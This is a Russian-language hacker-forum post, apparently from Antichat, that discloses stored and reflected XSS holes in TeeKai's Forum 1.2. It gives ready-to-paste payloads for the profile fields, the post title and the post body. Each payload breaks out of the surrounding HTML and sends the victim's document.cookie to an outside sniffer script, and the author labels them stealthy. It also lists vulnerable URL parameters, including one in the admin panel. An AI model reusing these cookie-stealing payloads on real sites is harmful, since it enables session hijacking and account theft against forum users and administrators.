Форум АНТИЧАТ - XSS(active & passive) в TeeKai's Forum version 1.2

TeeKai's Forum version 1.2

Этот движок я нашёл у себя на халявном диске большого срока давности...Поэтому я думаю он такой и дырявый.
Поставил на локалку - и в лицо брызнуло ошибками. Странно, но на оффсайте производителя я не нашёл
ничего связанного с форумами... (http://www.teekai.info/)

1) Регестрируем пользователя. Лезем в профиль, вбиваем скрипт для вставки сниффера полях имени, возраста,
паги и урла для неё, страны.

Непалевный способ для поля url:
http://ya.ru"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><a target="_blank

Непалевный способ для поля name:
Name"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><font size="1

Непалевный способ для поля возраста, страны и названия паги:
la"><script>img=new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script><input class="fields

Теперь наш скрипт выполняется при просмотре нашего профиля (там выводятся все юзверы сразу),a также при просмотре
созданной нами темы.

2) Создаём новый пост. Вставляем скрипт в поле для заголовка(title) и в поле для сообщения - оба они так и ждут, чтобы
через них вставили сниффер =).

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Теперь наш скрипт выполняется при просмотре созданного топика.

3) Пассивные:

http://ya.ru/tee/index.php?action=ad...leteforums&id=[_X_S_S_] (из админки)
http://ya.ru/tee/viewtopic.php?action=viewtopic&cat=[_X_S_S_]&forumname=[_X_S_S_]&command=viewtopic&name=[_X_S_S_]&date=[_X_S_S_]&time=[_X_S_S_]

P.S. И снова я заранее извиняюсь, если эта инфа уже была где-то выложена до меня... Мне как всегда лень и жаль трафика проверять, первый ли я в нахождении багов...